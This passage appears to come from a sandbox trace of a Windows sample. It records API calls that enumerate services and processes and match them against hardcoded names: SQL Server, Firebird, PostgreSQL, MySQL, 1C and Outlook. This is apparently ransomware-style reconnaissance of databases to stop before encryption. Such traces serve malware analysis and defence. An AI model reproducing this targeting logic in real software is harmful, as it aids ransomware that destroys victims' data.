dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0033.897] GetLastError () returned 0xea [0033.897] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x11e4) returned 0x629e28 [0033.897] EnumServicesStatusExW (in: hSCManager=0x6267d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x629e28, cbBufSize=0x11e4, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x629e28, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0033.898] CloseServiceHandle (hSCObject=0x6267d0) returned 1 [0033.898] lstrlenW (lpString="Appinfo") returned 7 [0033.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0033.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0033.898] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0033.898] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0033.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0033.899] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0033.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.899] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0033.899] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0033.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0033.899] lstrlenW (lpString="AudioSrv") returned 8 [0033.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0033.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0033.899] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0033.899] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0033.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0033.899] lstrlenW (lpString="BFE") returned 3 [0033.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0033.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0033.899] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0033.899] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0033.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0033.899] lstrlenW (lpString="CryptSvc") returned 8 [0033.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0033.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0033.899] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0033.899] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0033.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0033.899] lstrlenW (lpString="CscService") returned 10 [0033.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0033.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0033.899] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0033.899] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0033.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0033.899] lstrlenW (lpString="DcomLaunch") returned 10 [0033.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.899] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0033.899] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0033.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0033.900] lstrlenW (lpString="Dhcp") returned 4 [0033.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0033.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0033.900] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0033.900] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0033.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0033.900] lstrlenW (lpString="Dnscache") returned 8 [0033.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0033.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0033.900] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0033.900] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0033.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0033.900] lstrlenW (lpString="DPS") returned 3 [0033.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0033.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0033.900] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0033.900] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0033.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0033.900] lstrlenW (lpString="eventlog") returned 8 [0033.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0033.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0033.900] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0033.900] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0033.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0033.900] lstrlenW (lpString="EventSystem") returned 11 [0033.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0033.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0033.900] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0033.900] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0033.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0033.900] lstrlenW (lpString="gpsvc") returned 5 [0033.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0033.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0033.900] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0033.900] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0033.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0033.901] lstrlenW (lpString="iphlpsvc") returned 8 [0033.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.901] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0033.901] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0033.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0033.901] lstrlenW (lpString="LanmanServer") returned 12 [0033.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0033.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0033.901] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0033.901] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0033.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0033.901] lstrlenW (lpString="LanmanWorkstation") returned 17 [0033.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.901] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0033.901] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0033.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0033.901] lstrlenW (lpString="lmhosts") returned 7 [0033.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0033.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0033.901] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0033.901] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0033.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0033.901] lstrlenW (lpString="MMCSS") returned 5 [0033.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0033.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0033.901] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0033.901] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0033.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0033.901] lstrlenW (lpString="MpsSvc") returned 6 [0033.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0033.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0033.901] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0033.901] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0033.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0033.902] lstrlenW (lpString="Netman") returned 6 [0033.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0033.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0033.902] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0033.902] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0033.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0033.902] lstrlenW (lpString="netprofm") returned 8 [0033.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0033.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0033.902] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0033.902] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0033.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0033.902] lstrlenW (lpString="NlaSvc") returned 6 [0033.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0033.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0033.902] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0033.902] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0033.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0033.902] lstrlenW (lpString="nsi") returned 3 [0033.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0033.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0033.902] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0033.902] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0033.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0033.902] lstrlenW (lpString="PcaSvc") returned 6 [0033.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0033.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0033.902] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0033.902] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0033.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0033.902] lstrlenW (lpString="PlugPlay") returned 8 [0033.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0033.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0033.902] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0033.902] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0033.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0033.903] lstrlenW (lpString="Power") returned 5 [0033.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0033.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0033.903] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0033.903] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0033.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0033.903] lstrlenW (lpString="ProfSvc") returned 7 [0033.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0033.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0033.903] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0033.903] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0033.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0033.903] lstrlenW (lpString="RpcEptMapper") returned 12 [0033.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.903] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0033.903] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0033.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0033.903] lstrlenW (lpString="RpcSs") returned 5 [0033.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0033.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0033.903] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0033.903] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0033.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0033.903] lstrlenW (lpString="SamSs") returned 5 [0033.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0033.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0033.903] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0033.903] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0033.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0033.903] lstrlenW (lpString="Schedule") returned 8 [0033.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0033.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0033.903] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0033.904] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0033.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0033.904] lstrlenW (lpString="SENS") returned 4 [0033.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0033.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0033.904] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0033.904] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0033.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0033.904] lstrlenW (lpString="ShellHWDetection") returned 16 [0033.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.904] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0033.904] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0033.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0033.904] lstrlenW (lpString="Spooler") returned 7 [0033.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0033.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0033.904] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0033.904] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0033.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0033.904] lstrlenW (lpString="SysMain") returned 7 [0033.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0033.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0033.904] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0033.904] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0033.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0033.904] lstrlenW (lpString="Themes") returned 6 [0033.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0033.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0033.904] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0033.904] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0033.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0033.904] lstrlenW (lpString="TrkWks") returned 6 [0033.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0033.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0033.904] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0033.905] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0033.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0033.905] lstrlenW (lpString="UxSms") returned 5 [0033.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0033.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0033.905] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0033.905] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0033.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0033.905] lstrlenW (lpString="WdiServiceHost") returned 14 [0033.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.905] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0033.905] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0033.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0033.905] lstrlenW (lpString="WdiSystemHost") returned 13 [0033.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.905] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0033.905] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0033.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0033.905] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0033.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.905] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0033.905] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0033.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0033.905] lstrlenW (lpString="Winmgmt") returned 7 [0033.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0033.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0033.905] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0033.905] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0033.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0033.905] lstrlenW (lpString="WPDBusEnum") returned 10 [0033.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.906] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0033.906] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0033.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0033.906] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x629e28 | out: hHeap=0x5d0000) returned 1 [0033.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x164 [0033.908] Process32FirstW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0033.909] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0033.909] lstrlenW (lpString="System") returned 6 [0033.909] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0033.909] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0033.909] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0033.909] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0033.909] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0033.909] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0033.909] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0033.909] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0033.910] lstrlenW (lpString="smss.exe") returned 8 [0033.910] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0033.910] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0033.910] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0033.910] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0033.910] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0033.910] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0033.910] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0033.910] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.911] lstrlenW (lpString="csrss.exe") returned 9 [0033.911] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.911] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.911] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.911] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.911] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.911] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.911] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0033.911] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0033.912] lstrlenW (lpString="wininit.exe") returned 11 [0033.912] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0033.912] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0033.912] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0033.912] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0033.912] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0033.912] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0033.912] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0033.912] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.913] lstrlenW (lpString="csrss.exe") returned 9 [0033.913] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.913] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.913] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.913] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.913] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.913] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.913] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0033.914] lstrlenW (lpString="winlogon.exe") returned 12 [0033.914] Process32NextW (in: 